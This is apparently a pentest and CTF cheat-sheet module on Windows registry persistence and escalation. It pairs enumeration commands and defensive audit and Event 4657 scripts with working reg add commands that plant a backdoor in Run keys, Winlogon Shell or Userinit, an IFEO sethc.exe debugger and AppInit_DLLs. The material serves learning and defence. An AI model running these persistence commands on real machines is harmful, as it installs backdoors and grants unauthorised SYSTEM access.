# Registry-Based Escalation

## Overview

The Windows Registry contains numerous locations where programs, services, and the OS itself read configuration data during startup or user logon. If an attacker can write to these keys, they can achieve persistence or privilege escalation by pointing to a malicious binary or script.

## Prerequisites

  • Write access to registry keys (may require SeImpersonatePrivilege, or a service account with registry write permissions)
  • Ability to place a malicious binary on disk or reference an existing one

## Detection & Enumeration

```cmd
:: Check AutoRun keys
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

:: Check Winlogon keys
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit

:: Check Image File Execution Options (IFEO)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

:: Check AppInit_DLLs
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs

:: Check services whose configuration is writable by Authenticated Users (accesschk -c = services)
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

:: Check for writable registry keys (accesschk -k = registry keys, -w = write access only)
accesschk.exe /accepteula -kw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
```
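The `reg query` and `accesschk` commands above show raw values; the PowerShell script below is an added example (not part of the original module and not PowerUp code) that reads the same locations and reports only what deviates from a stock baseline: a non-default Winlogon `Shell`/`Userinit`, any IFEO `Debugger` value, a populated `AppInit_DLLs`, Run/RunOnce entries launching from user-writable directories, and Run-key ACLs that let low-privilege principals write values. The directory list and the principal names are assumptions to tune per environment.

```powershell
# Added example (not from the original module): read-only audit of the registry
# locations listed above, reporting anything that deviates from a stock baseline.
# Run from an elevated PowerShell prompt so HKLM ACLs and all IFEO subkeys are readable.

$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Key, [string]$Name, [string]$Value, [string]$Reason) {
    $findings.Add([pscustomobject]@{ Key = $Key; Name = $Name; Value = $Value; Reason = $Reason })
}

# 1. Winlogon: Shell and Userinit should match the defaults of a stock install.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$expected = @{ Shell = 'explorer.exe'; Userinit = 'C:\Windows\system32\userinit.exe' }
$wl = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
foreach ($name in $expected.Keys) {
    $actual = [string]$wl.$name
    # Userinit legitimately carries a trailing comma; compare without it (-ne is case-insensitive).
    if ($actual -and $actual.TrimEnd(',') -ne $expected[$name]) {
        Add-Finding $winlogon $name $actual "differs from default '$($expected[$name])'"
    }
}

# 2. IFEO: any subkey with a Debugger value redirects that program to another binary.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
    $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) { Add-Finding $_.Name 'Debugger' $dbg 'IFEO Debugger value present' }
}

# 3. AppInit_DLLs: should be empty on a healthy host.
$appinit = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows'
$ai = Get-ItemProperty -Path $appinit -ErrorAction SilentlyContinue
if ($ai.AppInit_DLLs) {
    Add-Finding $appinit 'AppInit_DLLs' $ai.AppInit_DLLs "non-empty (LoadAppInit_DLLs=$($ai.LoadAppInit_DLLs))"
}

# 4. Run/RunOnce: flag entries that launch from user-writable locations, and key ACLs
#    that let low-privilege principals add or change values.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$userWritable = @('C:\Temp\', 'C:\Users\', 'C:\ProgramData\')            # assumption: tune per environment
$lowPrivIds   = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$metaProps    = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
$writeBits    = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                      [System.Security.AccessControl.RegistryRights]::CreateSubKey)

foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($metaProps -contains $p.Name) { continue }          # skip provider metadata
        $cmd = ([string]$p.Value).TrimStart('"')
        foreach ($dir in $userWritable) {
            if ($cmd -like "$dir*") { Add-Finding $key $p.Name $p.Value "launches from user-writable path $dir"; break }
        }
    }
    foreach ($ace in (Get-Acl -Path $key).Access) {
        $canWrite = ([int]$ace.RegistryRights -band $writeBits) -ne 0
        if ($ace.AccessControlType -eq 'Allow' -and $canWrite -and $lowPrivIds -contains $ace.IdentityReference.Value) {
            Add-Finding $key '(key ACL)' $ace.IdentityReference.Value "can write values ($($ace.RegistryRights))"
        }
    }
}

if ($findings.Count -eq 0) { 'No deviations found.' } else { $findings | Format-Table -AutoSize -Wrap }
```

The ACL check is the defender's counterpart to the `accesschk -kw` command: a low-privilege principal with `SetValue` or `CreateSubKey` on an HKLM Run key is a misconfiguration to fix even before any suspicious value appears.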

## PowerUp.ps1 Automated Checks

```powershell
# Import PowerUp (dot-sourcing `. .\PowerUp.ps1` also works)
Import-Module .\PowerUp.ps1

# Check for autorun registry entries whose target binary or key is modifiable
Get-ModifiableRegistryAutoRun

# Helper used by the other checks: given a command line or path, returns the parts
# the current user can modify (pipe a string into it)
Get-ModifiablePath

# Check for AlwaysInstallElevated
Get-AlwaysInstallElevated

# Full unprivileged check
Invoke-AllChecks
```

## Exploitation / Execution

### AutoRun Key Persistence

```cmd
:: Add a persistent entry (requires admin or per-user)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"

:: Per-user auto-run (no admin needed)
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"
```

### Winlogon Shell Replacement

```cmd
:: Replace the shell (destructive: replaces explorer.exe)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\temp\backdoor.exe"

:: Safer: use Userinit (runs before the shell)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\temp\backdoor.exe"
```

### Image File Execution Options (IFEO) Debugger

```cmd
:: Set a debugger for a legitimate program that runs as SYSTEM
:: When sethc.exe (Sticky Keys) is executed at the lock screen, it launches our binary instead
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\temp\backdoor.exe"

:: At the lock screen, press Shift 5 times to trigger
:: Common IFEO targets: sethc.exe, Utilman.exe, osk.exe, Magnify.exe, Narrator.exe
```

### AppInit_DLLs

```cmd
:: Load a custom DLL into every process that loads user32.dll
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\temp\evil.dll"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1

:: Note: requires LoadAppInit_DLLs=1; Secure Boot blocks AppInit_DLLs loading on modern Windows
```

## Common Pitfalls

  • ⚠️ IFEO debugger only triggers when the target executable is launched — Sticky Keys (sethc.exe) at the lock screen is the most reliable trigger
  • ⚠️ AppInit_DLLs is blocked when Secure Boot is enabled (Windows 8+)
  • ⚠️ Modifying Winlogon Shell replaces explorer.exe — the desktop won't load normally
  • ⚠️ HKLM keys require Administrator or SYSTEM access; HKCU keys only affect the current user

## OPSEC Considerations

  • 🛡️ Registry modifications to Run/RunOnce keys are visible in autoruns analysis (Sysinternals Autoruns)
  • 🛡️ IFEO debugger entries show up in autoruns and are easily detected
  • 🛡️ Windows Event ID 4657 logs registry value modifications when Object Access auditing is enabled
  • 🛡️ EDR products commonly monitor HKLM Run keys and IFEO entries
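The Event ID 4657 point above only pays off if auditing is actually switched on and the events are filtered down to the keys that matter. The script below is an added example (not part of the original module): `Enable-RegistryWriteAudit` enables Success auditing for the Registry subcategory and places an audit SACL on a key, and `Get-RegistryPersistenceEvents` pulls the 4657 events that touch the locations in this module and shows who changed what from which process. Function names are my own; it assumes an elevated prompt and that no GPO overrides the local audit policy.

```powershell
# Added example (not from the original module): make 4657 registry-modification events
# useful for the persistence locations covered on this page.

function Enable-RegistryWriteAudit {
    param([Parameter(Mandatory)][string]$Key)   # e.g. 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    # 4657 lives in the "Registry" subcategory of Object Access; enable Success auditing for it.
    auditpol /set /subcategory:"Registry" /success:enable | Out-Null
    # Add a SACL so writes by anyone to this key (and its subkeys) generate events.
    $acl  = Get-Acl -Path $Key -Audit
    $rule = New-Object System.Security.AccessControl.RegistryAuditRule(
        'Everyone',
        [System.Security.AccessControl.RegistryRights]'SetValue,CreateSubKey,Delete',
        [System.Security.AccessControl.InheritanceFlags]::ContainerInherit,
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AuditFlags]::Success)
    $acl.AddAuditRule($rule)
    Set-Acl -Path $Key -AclObject $acl
}

# Key fragments from this module. In 4657, ObjectName is reported in kernel form,
# e.g. \REGISTRY\MACHINE\SOFTWARE\... or \REGISTRY\USER\<SID>\SOFTWARE\...
$watched = @(
    'Microsoft\Windows\CurrentVersion\Run'                                  # also matches RunOnce
    'Microsoft\Windows NT\CurrentVersion\Winlogon'
    'Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    'Microsoft\Windows NT\CurrentVersion\Windows'                           # AppInit_DLLs lives here
)

function Get-RegistryPersistenceEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    $filter = @{ LogName = 'Security'; Id = 4657; StartTime = $Since }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # EventData is a list of <Data Name="...">value</Data> elements; flatten it to a hashtable.
        $d = @{}
        foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if (-not ($watched | Where-Object { $d['ObjectName'] -like "*\$_*" })) { continue }
        [pscustomobject]@{
            Time      = $e.TimeCreated
            User      = '{0}\{1}' -f $d['SubjectDomainName'], $d['SubjectUserName']
            Process   = $d['ProcessName']
            Key       = $d['ObjectName']
            Value     = $d['ObjectValueName']
            Operation = $d['OperationType']   # message-resource code for create/modify/delete
            New       = $d['NewValue']
        }
    }
}

# Usage:
# Enable-RegistryWriteAudit -Key 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
# Get-RegistryPersistenceEvents -Since (Get-Date).AddHours(-6) | Format-Table -AutoSize -Wrap
```

Triage on the `Process` column: a `reg.exe`, `powershell.exe` or `cmd.exe` writing a Winlogon or IFEO value is worth a look, whereas installers (`msiexec.exe`) and the Windows Modules Installer routinely touch Run keys.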

## Post-Exploitation Value

Registry-based escalation provides either immediate privilege escalation (IFEO with SYSTEM programs) or persistence (Run keys, Winlogon). Combined with a reverse shell or executable, this grants persistent SYSTEM access.

## Tool References

| Tool      | Link                                                            |
|-----------|-----------------------------------------------------------------|
| PowerUp   | https://github.com/PowerShellMafia/PowerSploit                  |
| Autoruns  | https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns |
| accesschk | https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk |

## Source Machines

  • Support (Easy, Windows)
  • StreamIO (Hard, Windows)
  • ServMon (Easy, Windows)